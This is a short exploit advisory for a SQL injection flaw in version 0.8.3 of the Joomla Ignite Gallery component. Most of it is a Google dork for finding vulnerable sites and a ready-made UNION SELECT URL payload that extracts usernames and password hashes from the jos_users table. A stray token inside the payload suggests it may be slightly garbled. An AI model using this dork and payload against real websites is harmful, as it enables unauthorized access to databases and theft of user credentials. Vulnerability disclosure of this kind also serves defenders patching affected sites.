Joomla Ignite Gallery 0.8.3 SQL Injection vulnerability by Valon Keroll
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# Joomla Component Ignite Gallery SQL Injection Vulnerability #
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[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]
[~] Site:
[~] ScriptName: "Joomla"
[~] Component: "Ignite Gallery (com_ignitegallery)"
[~] Version: "0.8.3"
[~] Author: "Matt Thomson"
[~] Author E-mail: "[email protected]"
[~] Author URL: ""
[~] DORK: inurl:"com_ignitegallery"
[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
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